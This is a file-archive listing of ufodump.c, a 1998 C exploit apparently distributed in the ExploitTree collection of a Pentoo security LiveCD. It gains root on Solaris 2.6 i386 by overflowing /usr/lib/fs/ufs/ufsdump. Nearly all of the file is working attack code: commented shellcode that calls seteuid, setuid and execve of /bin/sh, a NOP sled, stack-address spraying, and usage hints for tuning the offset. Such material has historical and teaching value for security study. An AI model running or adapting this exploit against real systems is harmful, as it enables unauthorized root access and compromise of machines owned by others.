home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / ufodump.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  4.3 KB  |  106 lines
  1. /**
  2. ***  ufodump - i386 Solaris root exploit for /usr/lib/fs/ufs/ufsdump
  3. ***
  4. ***  Tested and confirmed under Solaris 2.6 i386
  5. ***
  6. ***  Usage:  % ufodump [offset]
  7. ***
  8. ***  where offset (if present) is the number of bytes to add to the stack
  9. ***  pointer to calculate your target return address; try -1000 to 1000 in
  10. ***  increments of 100 for starters.  Thanks go to Seth McGann for the
  11. ***  original bug report and a preliminary exploit.
  12. ***
  13. ***  Cheez Whiz
  14. ***  cheezbeast@hotmail.com
  15. ***
  16. ***  December 30, 1998
  17. **/
  18.  
  19. #include <stdio.h>
  20. #include <stdlib.h>
  21. #include <string.h>
  22. #include <unistd.h>
  23.  
  24. #define BUFLEN 1100
  25. #define NOP 0x90
  26.  
  27. char shell[] =
  28.   /*  0 */ "\xeb\x48"                         /* jmp springboard [2000]*/
  29.   /* syscall:                                                    [2000]*/
  30.   /*  2 */ "\x9a\xff\xff\xff\xff\x07\xff"     /* lcall 0x7,0x0   [2000]*/
  31.   /*  9 */ "\xc3"                             /* ret             [2000]*/
  32.   /* start:                                                      [2000]*/
  33.   /* 10 */ "\x5e"                             /* popl %esi       [2000]*/
  34.   /* 11 */ "\x31\xc0"                         /* xor %eax,%eax   [2000]*/
  35.   /* 13 */ "\x89\x46\xb4"                     /* movl %eax,-0x4c(%esi) */
  36.   /* 16 */ "\x88\x46\xb9"                     /* movb %al,-0x47(%esi)  */
  37.   /* 19 */ "\x88\x46\x07"                     /* movb %al,0x7(%esi)    */
  38.   /* 22 */ "\x89\x46\x0c"                     /* movl %eax,0xc(%esi)   */
  39.   /* seteuid:                                                    [2000]*/
  40.   /* 25 */ "\x31\xc0"                         /* xor %eax,%eax   [2000]*/
  41.   /* 27 */ "\x50"                             /* pushl %eax      [2000]*/
  42.   /* 28 */ "\xb0\x8d"                         /* movb $0x8d,%al  [2000]*/
  43.   /* 30 */ "\xe8\xdf\xff\xff\xff"             /* call syscall    [2000]*/
  44.   /* 35 */ "\x83\xc4\x04"                     /* addl $0x4,%esp  [2000]*/
  45.   /* setuid:                                                     [2000]*/
  46.   /* 38 */ "\x31\xc0"                         /* xor %eax,%eax   [2000]*/
  47.   /* 40 */ "\x50"                             /* pushl %eax      [2000]*/
  48.   /* 41 */ "\xb0\x17"                         /* movb $0x17,%al  [2000]*/
  49.   /* 43 */ "\xe8\xd2\xff\xff\xff"             /* call syscall    [2000]*/
  50.   /* 48 */ "\x83\xc4\x04"                     /* addl $0x4,%esp  [2000]*/
  51.   /* execve:                                                     [2000]*/
  52.   /* 51 */ "\x31\xc0"                         /* xor %eax,%eax   [2000]*/
  53.   /* 53 */ "\x50"                             /* pushl %eax      [2000]*/
  54.   /* 54 */ "\x8d\x5e\x08"                     /* leal 0x8(%esi),%ebx   */
  55.   /* 57 */ "\x53"                             /* pushl %ebx      [2000]*/
  56.   /* 58 */ "\x8d\x1e"                         /* leal (%esi),%ebx[2000]*/
  57.   /* 60 */ "\x89\x5e\x08"                     /* movl %ebx,0x8(%esi)   */
  58.   /* 63 */ "\x53"                             /* pushl %ebx      [2000]*/
  59.   /* 64 */ "\xb0\x3b"                         /* movb $0x3b,%al  [2000]*/
  60.   /* 66 */ "\xe8\xbb\xff\xff\xff"             /* call syscall    [2000]*/
  61.   /* 71 */ "\x83\xc4\x0c"                     /* addl $0xc,%esp  [2000]*/
  62.   /* springboard:                                                [2000]*/
  63.   /* 74 */ "\xe8\xbb\xff\xff\xff"             /* call start      [2000]*/
  64.   /* data:                                                       [2000]*/
  65.   /* 79 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA            [2000]*/
  66.   /* 87 */ "\xff\xff\xff\xff"                 /* DATA            [2000]*/
  67.   /* 91 */ "\xff\xff\xff\xff";                /* DATA            [2000]*/
  68.  
  69. char buf[BUFLEN];
  70. unsigned long int nop, esp;
  71. long int offset = 0;
  72.  
  73. unsigned long int
  74. get_esp()
  75. {
  76.   __asm__("movl %esp,%eax");
  77. }
  78.  
  79. void
  80. main (int argc, char *argv[])
  81. {
  82.   int i;
  83.  
  84.   if (argc > 1)
  85.     offset = strtol(argv[1], NULL, 0);
  86.  
  87.   if (argc > 2)
  88.     nop = strtoul(argv[2], NULL, 0);
  89.   else
  90.     nop = 800;
  91.  
  92.   esp = get_esp();
  93.  
  94.   memset(buf, NOP, BUFLEN);
  95.   memcpy(buf+nop, shell, strlen(shell));
  96.   for (i = nop+strlen(shell); i < BUFLEN-4; i += 4)
  97.     *((int *) &buf[i]) = esp+offset;
  98.  
  99.   printf("jumping to 0x%08x (0x%08x offset %d) [nop %d]\n",
  100.          esp+offset, esp, offset, nop);
  101.   execl("/usr/lib/fs/ufs/ufsdump", "ufsdump", "1", buf, NULL);
  102.  
  103.   printf("exec failed!\n");
  104.   return;
  105. }
  106. /*                    www.hack.co.za              [2000]*/